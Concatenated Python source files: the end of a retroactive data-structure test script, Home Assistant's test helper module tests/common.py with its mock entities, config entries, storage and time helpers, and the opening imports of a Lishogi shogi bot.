print("Sum(0):", s.observe("sum"))
print("Sum(1):", s.observe("sum", 1))
print("Retrosum(1):", rsum)
print("Retromin(1):", rmin)
t, op, k = 8, "delete", 1
print("Adding %s(%s) at time %d" % (op, k, t))
s.add(t, op, k)
print("State:", s)
print("Sum(0):", s.observe("sum"))
print("Sum(1):", s.observe("sum", 1))
print("Retrosum(1):", rsum)
print("Retromin(1):", rmin)
t = 4
print("Erasing op at time %d" % (t))
s.erase(t)
print("State:", s)
print("Sum(0):", s.observe("sum"))
print("Sum(1):", s.observe("sum", 1))
print("Retrosum(1):", rsum)
print("Retromin(1):", rmin)
return s
if __name__ == '__main__':
get_test()
|
common.py | """Test the helper method for writing tests."""
from __future__ import annotations
import asyncio
import collections
from collections import OrderedDict
from collections.abc import Awaitable, Collection
from contextlib import contextmanager
from datetime import datetime, timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import pathlib
import threading
import time
from time import monotonic
import types
from typing import Any
from unittest.mock import AsyncMock, Mock, patch
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa: F401
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import device_automation, recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
)
from homeassistant.components.mqtt.models import ReceiveMessage
from homeassistant.config import async_process_component_config
from homeassistant.const import (
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import BLOCK_LOG_TIMEOUT, HomeAssistant, State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.uuid as uuid_util
import homeassistant.util.yaml.loader as yaml_loader
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
async def async_get_device_automations(
hass: HomeAssistant,
automation_type: device_automation.DeviceAutomationType,
device_id: str,
) -> Any:
"""Get a device automation for a single device id."""
automations = await device_automation.async_get_device_automations(
hass, automation_type, [device_id]
)
return automations.get(device_id)
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
The callback needs to have `hass` as its first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
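# Usage sketch (hypothetical names): wrap an async helper so synchronous test
# code can call it, e.g. setup_comp = threadsafe_coroutine_factory(async_setup_comp),
# where async_setup_comp is any coroutine taking hass as its first argument.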
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
loop_stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
loop_stop_event.set()
orig_stop = hass.stop
hass._stopped = Mock(set=loop.stop)
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
loop_stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop, load_registries=True):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
async def async_wait_for_task_count(self, max_remaining_tasks: int = 0) -> None:
"""Block until at most max_remaining_tasks remain.
Based on HomeAssistant.async_block_till_done
"""
# To flush out any call_soon_threadsafe
await asyncio.sleep(0)
start_time: float | None = None
while len(self._pending_tasks) > max_remaining_tasks:
pending: Collection[Awaitable[Any]] = [
task for task in self._pending_tasks if not task.done()
]
self._pending_tasks.clear()
if len(pending) > max_remaining_tasks:
remaining_pending = await self._await_count_and_log_pending(
pending, max_remaining_tasks=max_remaining_tasks
)
self._pending_tasks.extend(remaining_pending)
if start_time is None:
# Avoid calling monotonic() until we know
# we may need to start logging blocked tasks.
start_time = 0
elif start_time == 0:
# If we have waited twice then we set the start
# time
start_time = monotonic()
elif monotonic() - start_time > BLOCK_LOG_TIMEOUT:
# We have waited at least three loops and new tasks
# continue to block. At this point we start
# logging all waiting tasks.
for task in pending:
_LOGGER.debug("Waiting for task: %s", task)
else:
self._pending_tasks.extend(pending)
await asyncio.sleep(0)
async def _await_count_and_log_pending(
self, pending: Collection[Awaitable[Any]], max_remaining_tasks: int = 0
) -> Collection[Awaitable[Any]]:
"""Block at most max_remaining_tasks remain and log tasks that take a long time.
Based on HomeAssistant._await_and_log_pending
"""
wait_time = 0
return_when = asyncio.ALL_COMPLETED
if max_remaining_tasks:
return_when = asyncio.FIRST_COMPLETED
while len(pending) > max_remaining_tasks:
_, pending = await asyncio.wait(
pending, timeout=BLOCK_LOG_TIMEOUT, return_when=return_when
)
if not pending or max_remaining_tasks:
return pending
wait_time += BLOCK_LOG_TIMEOUT
for task in pending:
_LOGGER.debug("Waited %s seconds for task: %s", wait_time, task)
return []
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.async_wait_for_task_count = types.MethodType(async_wait_for_task_count, hass)
hass._await_count_and_log_pending = types.MethodType(
_await_count_and_log_pending, hass
)
hass.data[loader.DATA_CUSTOM_COMPONENTS] = {}
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = "US/Pacific"
hass.config.units = METRIC_SYSTEM
hass.config.media_dirs = {"local": get_test_config_dir("media")}
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(
hass,
{
"_": "Not empty or else some bad checks for hass config in discovery.py breaks"
},
)
hass.config_entries._entries = {}
hass.config_entries._store._async_ensure_stop_listener = lambda: None
# Load the registries
if load_registries:
await asyncio.gather(
device_registry.async_load(hass),
entity_registry.async_load(hass),
area_registry.async_load(hass),
)
await hass.async_block_till_done()
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
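# Usage sketch (hypothetical domain/service): calls = async_mock_service(hass,
# "light", "turn_on"); every matching service invocation then lands in the
# `calls` list as a ServiceCall for later assertions.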
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
async def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = ReceiveMessage(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(
hass: HomeAssistant, datetime_: datetime | None = None, fire_all: bool = False
) -> None:
"""Fire a time changed event."""
if datetime_ is None:
datetime_ = date_util.utcnow()
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
mock_seconds_into_future = datetime_.timestamp() - time.time()
future_seconds = task.when() - hass.loop.time()
if fire_all or mock_seconds_into_future >= future_seconds:
with patch(
"homeassistant.helpers.event.time_tracker_utcnow",
return_value=date_util.as_utc(datetime_),
):
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
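# Usage sketch (hypothetical test code): jump the mocked clock forward so
# time-based listeners fire, then drain the loop:
# async_fire_time_changed(hass, date_util.utcnow() + timedelta(minutes=5))
# await hass.async_block_till_done()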
def get_fixture_path(filename: str, integration: str | None = None) -> pathlib.Path:
"""Get path of fixture."""
if integration is None and "/" in filename and not filename.startswith("helpers/"):
integration, filename = filename.split("/", 1)
if integration is None:
return pathlib.Path(__file__).parent.joinpath("fixtures", filename)
else:
return pathlib.Path(__file__).parent.joinpath(
"components", integration, "fixtures", filename
)
def load_fixture(filename, integration=None):
"""Load a fixture."""
return get_fixture_path(filename, integration).read_text()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
if mock_entries is None:
mock_entries = {}
registry.entities = entity_registry.EntityRegistryItems()
for key, entry in mock_entries.items():
registry.entities[key] = entry
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
registry._rebuild_index()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options=None,
pref_disable_new_entities=None,
pref_disable_polling=None,
unique_id=None,
disabled_by=None,
reason=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid_util.random_uuid_hex(),
"domain": domain,
"data": data or {},
"pref_disable_new_entities": pref_disable_new_entities,
"pref_disable_polling": pref_disable_polling,
"options": options,
"version": version,
"title": title,
"unique_id": unique_id,
"disabled_by": disabled_by,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
if reason is not None:
self.reason = reason
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries[self.entry_id] = self
hass.config_entries._domain_index.setdefault(self.domain, []).append(
self.entry_id
)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries[self.entry_id] = self
manager._domain_index.setdefault(self.domain, []).append(self.entry_id)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(files_dict.keys(), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if isinstance(fname, pathlib.Path):
fname = str(fname)
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
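# Usage sketch (hypothetical file content): serve configuration.yaml from
# memory; endswith matching lets a short suffix stand in for the full path:
# with patch_yaml_files({"configuration.yaml": "light:\n  platform: demo"}):
#     yaml_loader.load_yaml(get_test_config_dir("configuration.yaml"))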
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The number of valid platforms that should be set up
- domain: The domain to count; optional, as it can usually be
determined automatically
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
async def async_init_recorder_component(hass, add_config=None):
"""Initialize the recorder asynchronously."""
config = add_config or {}
if recorder.CONF_DB_URL not in config:
config[recorder.CONF_DB_URL] = "sqlite://"
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert await async_setup_component(
hass, recorder.DOMAIN, {recorder.DOMAIN: config}
)
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def entity_category(self):
"""Return the entity category."""
return self._handle("entity_category")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
@property
def icon(self):
"""Return the suggested icon."""
return self._handle("icon")
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
raise_contains_mocks(data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
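# Usage sketch (key and payload are made up): pre-seed storage and inspect
# what the code under test persisted, already round-tripped through JSON:
# with mock_storage({"core.uuid": {"version": 1, "data": {"uuid": "abc"}}}) as stored:
#     ...  # exercise code that reads/writes homeassistant.helpers.storage
# assert "core.uuid" in stored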
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"][domain].info_callback(hass)
def mock_integration(hass, module, built_in=True):
"""Mock an integration."""
integration = loader.Integration(
hass,
f"{loader.PACKAGE_BUILTIN}.{module.DOMAIN}"
if built_in
else f"{loader.PACKAGE_CUSTOM_COMPONENTS}.{module.DOMAIN}",
None,
module.mock_manifest(),
)
def mock_import_platform(platform_name):
raise ImportError(
f"Mocked unable to import platform '{platform_name}'",
name=f"{integration.pkg_path}.{platform_name}",
)
integration._import_platform = mock_import_platform
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
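# Usage sketch (hypothetical domain): mock_platform(hass, "hue.config_flow")
# registers a plain Mock as the hue integration's config_flow platform,
# creating a MockModule integration for "hue" on the fly if none exists.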
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
def raise_contains_mocks(val):
"""Raise for mocks."""
if isinstance(val, Mock):
raise ValueError
if isinstance(val, dict):
for dict_value in val.values():
raise_contains_mocks(dict_value)
if isinstance(val, list):
for dict_value in val:
raise_contains_mocks(dict_value)
|
lishogibot.py | import argparse
import shogi
import engine_wrapper
import model
import json
import lishogi
import logging
import multiprocessing
from multiprocessing import Process
import signal
import backoff
from config import load_config
from conversation import Conversation, ChatLine
from functools import partial
from requests.exceptions import HTTPError, ReadTimeout
from util import switchusiuci, makeusi, makesfenfromfen
logger = logging.getLogger(__name__)
try:
from http.client import RemoteDisconnected
# New in version 3.5: Previously, BadStatusLine('') was raised.
except ImportError:
from http.client import BadStatusLine as RemoteDisconnected
__version__ = "0.6.0"
terminated = False
def signal_handler(signal, frame):
global terminated
